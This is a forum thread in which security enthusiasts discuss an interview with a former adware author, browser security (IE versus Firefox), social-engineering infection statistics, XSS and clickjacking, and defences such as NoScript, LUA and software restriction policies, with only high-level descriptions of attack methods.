-{ Quote: "Matt Knox, a talented Ruby instructor and coder, talks about his early days designing and writing adware for Direct Revenue. (Direct Revenue was sued by Eliot Spitzer in 2006 for allegedly surreptitiously installing adware on millions of computers.)" }-
http://philosecurity.org/2009/01/12/interview-with-an-adware-author

Great interview if you ask me.

Thanks for the link, Pedro. Very good interview.

Pedro, excellent interview :thumb: especially the question: Can you tell me more about your strategies for persistence? If that section doesn't make people think twice about using IE, nothing will!

Thanks. It was a good interview.

-{ Quote: "Pedro, excellent interview :thumb: especially the question: Can you tell me more about your strategies for persistence? If that section doesn't make people think twice about using IE, nothing will!" }-

Indeed. On the other hand even many forum members here (who should be aware of security issues) still use IE. And I guess many of them have ActiveX and BHO's still enabled. Considering this sad fact - why should anyone expect non-members change their habits? ;D

EDIT: A nice comment by Giorgio Maone (http://hackademix.net/2008/12/17/opera-firefox-and-ie-security-updates-all-together-all-the-same/) on IE versus other browsers.

-{ Quote: "Pedro, excellent interview :thumb: especially the question: Can you tell me more about your strategies for persistence? If that section doesn't make people think twice about using IE, nothing will!" }-But note also these:

-{ Quote: "M: Their business model was that they would buy a screensaver from somebody, or develop it themselves. It would be some stupid thing like a guy who’s washing their screen. Looks like a window washer guy? They’d say “Hey, if you want this, install our adware and you can have it for free.” An astonishing number of people will do that." }--{ Quote: "Don’t fool yourself: Firefox would not have saved you. There are two reasons for this.

First, we did not take advantage of IE vulnerabilities to get on the machine, nor did we need to. Once you clicked on the ‘download’ button, whatever your browser, we were just another setup program.

Second, we eventually abandoned the IE-specific BHO architecture in favor of using the Accessibility API, which works with all browsers, and some version of which exists on most operating systems. [comment #66]" }--{ Quote: "M: People can have things as good as they are willing to work for. If you want to have a system that’s clean of nasty software, you can do that. " }-I know users of IE who would agree.

----
rich

-{ Quote: "Indeed. On the other hand even many forum members here (who should be aware of security issues) still use IE. And I guess many of them have ActiveX and BHO's still enabled. Considering this sad fact - why should anyone expect non-members change their habits? ;D" }-
tlu, I agree with you that many of our forum members will continue to use IE no matter what, however, indicative of their sigs, most have armed themselves with hardware and software that Joe Public might never use.

My comment was/is directed at those who visit Wilders seeking knowledge (like I did many years ago) rather than persuading long time forum members. For as long as articles are posted, like Pedro did, there is a chance that we can motivate people to change their ways, even if it is only one person at a time . That's all we can hope for.

-{ Quote: "Second, we eventually abandoned the IE-specific BHO architecture in favor of using the Accessibility API, which works with all browsers, and some version of which exists on most operating systems." }-
Rmus, yes, it's very clever to use the accessibility.api, found in Adobe Reader, to infiltrate all browsers and most OSes with adware, but I'm glad you brought that up because a conflict with Reader was the main reason why I gave up on IE7 and went to Firefox.

When IE7 first came out officially, not BETA, in 2006, I had a heck of a time with the browser crashing and so did many others as seen by the frequency of forums' postings in those days (even today, IE7 has crash issues with Adobe's Flash Player 10). Adobe Reader turned out to be the culprit, and with its inability to display a PDF page inside the IE7 browser then, made me look at Wilders for browser alternatives and that's when I discovered Firefox. I reverted back to IE6 and use it sparingly today.

Will I ever go back to IE? Perhaps. Every thing I read about IE8 piques my interest, however, this time, I won't rush into it.

-{ Quote: "Rmus, yes, it's very clever to use the accessibility.api, found in Adobe Reader, to infiltrate all browsers and most OSes with adware, " }-Please explain how this infiltration takes place.

-{ Quote: " Adobe Reader turned out to be the culprit, and with its inability to display a PDF page inside the IE7 browser " }-Just curious, why you display PDF files inside the browser rather than with the Reader.

----
rich

-{ Quote: "tlu, I agree with you that many of our forum members will continue to use IE no matter what, " }-What is wrong with that?

----
rich

Alternative browser is a good advice for the average Joe, I install Firefox to all my friends. But people on Wilders can choose browser based on their needs. ;)

-{ Quote: "Please explain how this infiltration takes place." }-
Rmus, that I will not do, sorry. The article offers the gist of it; let's leave it at that.
-{ Quote: "Just curious, why you display PDF files inside the browser rather than with the Reader." }-
Ease of use. I code Web sites and have many programs open, at any given time, while working on projects. Don't need another window bugging me.
-{ Quote: "What is wrong with that?" }-
Nothing at all; different strokes for different folks.

-{ Quote: "What is wrong with that?

----
rich" }-

Rich, there are several reasons. Some arguments can be found in the link (http://hackademix.net/2008/12/17/opera-firefox-and-ie-security-updates-all-together-all-the-same/) I provided above. Additional arguments are presented here (http://www.wilderssecurity.com/showpost.php?p=1386835&postcount=9).

The point is: IE is tightly integrated in Windows. A couple of other system applications (like Help and Desktop) use IE. To make this possible Microsoft extended the abilities of Javascript by creating JScript. JScript is as powerful as VBS: via FileSystemObject it can open or delete files, start applications, communicate with other processes etc. Thus, it's obvious that a security flaw affects very often many other aspects of the OS. Javascript (as used in, e.g, Firefox) is much more limited as it doesn't have a FileSystemObject and therefore no direct access to your local files. And, of course, Firefox (or any other browser) is not used for other system applications - a security flaw consequently won't affect other functionalities of the OS.

-{ Quote: "Please explain how this infiltration takes place." }-
-{ Quote: "Rmus, that I will not do, sorry. The article offers the gist of it; let's leave it at that." }-Fair enough. I wouldn't want you to reveal any "secrets." I just thought you might clarify what you mean by "infiltration." BHO and Accessibility API were discussed under "Persistence," meaning, as I understand it, what takes place after the user agrees to install the Adware, and are not the initial infection method. Some readers might conclude wrongly.

Regarding comments about IE: Because of the sensational news reports about IE and Windows, it is assumed that you live dangerously indeed if you use IE, for just opening even to a "legitimate" web site is cause for certain doom...

I exaggerate, of course, but uninformed readers of this stuff do come away with that impression. In the past year, more analysts and researchers are looking a bit more closely at the statistics and the real world.

From a recent Windows Secrets Newsletter:
-{ Quote: "Most PC users have a distorted view of the nature of the security risks they face. Conventional wisdom holds that the three biggest threats come from (1) criminals exploiting flaws in Windows and other software products; (2) e-mail-borne viruses; and, more recently, (3) visits to malicious Web sites.

Security research company Trend Micro recently reported that of the top 100 infections in the U.S. in 2008, approximately 63% were caused by downloading and running programs. E-mail-borne infections accounted for only 3%, while the exploitation of security flaws in products was responsible for a tiny 1.7% of PC infections." }-
http://de.trendmicro.com/de/about/news/pr/article/20081216155324.html
-{ Quote: ""This is what we've been seeing all year," said Paul Ferguson, network architect at Trend Micro. "This illustrates that social engineering seems to be playing a larger role than we thought. The problem isn't due to software vulnerabilities in, say, the browser."" }-I have confirmed this with a local shop: most victims admit that they downloaded something and didn't realize it was infected.

Social engineering (a polite way of describing user stupidity) is illustrated most recently by the flash_update.exe exploit,
where the user is enticed to watch an alluring video:

205517

No browser, nor even operating system, will protect against this type of exploit, as illustrated in this comment in an analysis last year of an update trick which served up the MAC DNS changer exploit:

-{ Quote: "The user is then prompted to install the package and during this process he will have to supply the administrator credentials. Yep, it's game over from this point in time (and the attack is exactly the same as on Windows - keep in mind that these users *will* willingly supply these credentials." }-Storm, one of the biggest botnets, ensnares its victims with a similar temptation:

205518

Returning to the exploitation of security flaws in products for a moment: the recent 7.7.7.0 Search Engine exploit showed how infection can occur by remote code execution (drive-by download) no matter the browser -- these comments from other forums:

-{ Quote: "Common to lots of other people (I guess), [Running Firefox] I clicked a Google link, the browser minimised, pop-ups appeared, you know the drill. I closed everything down and ran a full virus scan (AVG) - nothing was found.
....
In each case, my search results were redirected through the IP address 7.7.7.0.
I use Mozilla Firefox exclusively, rather than Internet Explorer
....

In short, there are some sites that performing remote code execution based on security vulnerabilities in unpatched or un-updated versions of Adobe Acrobat (Reader and Full) version 7 and 8. The rootkit is sent encapsulated in a PDF file and security holes in Acrobat allow the rootkit file to execute after reception.
...

But this is what I have observed thus far. After entering via the PDF security vulnerability, the file C:\WINDOWS\system32\sysaudio.sys is created and executes first as a Trojan and then a Rootkit Agent. " }-Later the filename changed to wdmaud.sys.

This, of course, is not a browser exploit per se, but illustrates how malware authors are becoming more sophisticated in how they target their victims.

It should be obvious to people that protection should not rely entirely on the browser or applications that may be vulnerable before a patch is released.

All of the Remote Code Execution Exploits that download malware that I have seen analyzed, have in common what I put in bold above:

executes first as a Trojan

What better way to protect than to start with the foundation layer of securing with Software Restriction Policies and LUA.
tlu's tutorials (which are worthy of publication, in my view) should be considered by all.

I will quote again from the interview,

-{ Quote: "M: People can have things as good as they are willing to work for. If you want to have a system that’s clean of nasty software, you can do that." }-

Of course, even this will not protect against the topic of discussion, where the user agrees to download and run the setup.exe which installs the adware.


----
rich

-{ Quote: "I just thought you might clarify what you mean by "infiltration." BHO and Accessibility API were discussed under "Persistence," meaning, as I understand it, what takes place after the user agrees to install the Adware, and are not the initial infection method. Some readers might conclude wrongly." }-
Rmus, you are correct, I was speaking after the user has clicked on whatever it's presented on screen, enticing that person to go beyond. The usage of the word infiltration is due to my ex-military background and I should be more careful not to paint things in such dire terms.

You are absolutely dead-on when you state user stupidity being the main reason why PCs get infected. I have clients who, no matter what you say to them, will click on an email link, open an attachment, download a screen saver, etc., then come pleading for help when their PCs turn into bricks. Yes, you switch them to Firefox and they still find a way to hurt themselves. You explain and have them try SRPs, LUAs and UACs, but some find them too restrictive and access the Administrator account to bypass it all. Well, I make money off of their misery but these people should not be allowed to own a computer. There ought to be a law against that!

Mind you, personally, I did not switch browsers because I thought IE was less secure (I'm in the tlu camp: I block everything in the Internet zone but do allow only the most trusted sites in the Trusted zone plus Sandboxie is my friend), I found FF because of the stated problem with IE7. The addition of NoScript and AdBlock Plus add-ons was just icing on the cake and IE Tab allows me not to fire up IE at all. Yes, I know about the IE7 Pro add-on but FF has become a good tool. After IE8 is out for 6 months, I'll give it a look, but FF 3.1 is looking mighty good as well. ;)

-{ Quote: "
From a recent Windows Secrets Newsletter:

Quote:
Most PC users have a distorted view of the nature of the security risks they face. Conventional wisdom holds that the three biggest threats come from (1) criminals exploiting flaws in Windows and other software products; (2) e-mail-borne viruses; and, more recently, (3) visits to malicious Web sites.

Security research company Trend Micro recently reported that of the top 100 infections in the U.S. in 2008, approximately 63% were caused by downloading and running programs. E-mail-borne infections accounted for only 3%, while the exploitation of security flaws in products was responsible for a tiny 1.7% of PC infections.

http://de.trendmicro.com/de/about/news/pr/article/20081216155324.html
I have confirmed this with a local shop: most victims admit that they downloaded something and didn't realize it was infected." }-

Rich, I agree in general. However, it's not only a matter of your OS becoming infected but also about surfing-related risks like password stealing, XSS, clickjacking, Iframe injection etc. If the figures presented here (http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=212901775&subSection=Vulnerabilities+and+threats) are only roughly realistic these dangers should not underestimated. Having said this, blocking any active content by default makes a lot of sense. From my point of view the Firefox extension Noscript is not only the best protection against these threats on the client side (and even unique in many respects) but also the most user-friendly. The zones concept in IE is simply unusable. Even if IE isn't a less secure browser compared to Firefox if it comes to security leaks and speed of patching, it lacks usability since a strategy of blocking everything by default and easily whitelisting only trustworthy sites can hardly be implemented in IE.

-{ Quote: "What better way to protect than to start with the foundation layer of securing with Software Restriction Policies and LUA. " }-
I won't disagree ;) but this doesn't protect against above mentioned surfing-related risks.

-{ Quote: "tlu's tutorials (which are worthy of publication, in my view) should be considered by all." }-
You're exaggerating :-[ but thanks for the praise.

-{ Quote: "Rich, I agree in general. However, it's not only a matter of your OS becoming infected but also about surfing-related risks like password stealing, XSS, clickjacking, Iframe injection etc. If the figures presented here (http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=212901775&subSection=Vulnerabilities+and+threats) are only roughly realistic these dangers should not underestimated." }-Hello, Thomas.

This is not entirely connected with the Adware exploit, but does hint at awareness of exploits in general

I don't see a break down in that article "70 Of Top 100 Web Sites Spread Malware," of specific risks, such as those you refer to. For example, the article also includes:

-{ Quote: "Spam messages with malicious links can also lead to site compromises. According to Websense's report, almost 85% of e-mail messages were spam during the second half of 2008, and more than 90% of spam messages contained links to spam sites or malicious sites." }-So we don't know what %age of those sites that spread malware have the exploits you mention.

In XSS exploits I think the biggest concerns with people are sites where they transact business -- especially their financial institutions

I assume you mean the non-persistent type of XSS, since to permenantly embed an XSS script on a banking or other financial site would be quite a feat indeed. So, a successful exploit requires


injection by means of a spoofed link when the user clicks on a link to take her/him to the secure login page. That is certainly a NO-NO and violates what should be a firm policy of only connecting via your own bookmark. This is similar to another in the NO-NO category, that of following links to install an executable file -- most recently illustrated in the fake obama web sites.


a web site that is vulnerable to that type of code injection


I haven't looked at Clickjacking in a while and I see that not much as been written on it since the disclosure of the vulnerability back in October. I have this in my notes:

http://ha.ckers.org/blog/20081007/clickjacking-details/
-{ Quote: "From an attacker’s perspective the most important thing is that a) they know where to click and b) they know the URL of the page they want you to click, in the case of cross domain access. So if either one of these two requirements aren’t met, the attack falls down." }-Nontheless, this is certainly something to watch for, to see if any exploits develop, and if the Browser vendors are working to plug this weakness. Meanwhile your suggestion of NoScript seems to be the best protection at the moment for those concerned.

----
rich

Regarding our discussion about browsers, there is a very illuminative article on http://www.heise-online.co.uk/news/Microsoft-PR-blunder-over-Internet-Explorer-security--/112526

I'm just waiting for comments from Harry. Then it will be complete.
All in all it is pretty scary. A 20k developement environment installed on a machine that is compromised. Now all pwned machines need is a text file update. Executables as threads, then threadless, WOW. Sounds like win32 over NT is an issue worse than any browser.

Thanks Tom and Rich for the added info. Scary stuff.

P.S. Do you guys sing any country music tunes?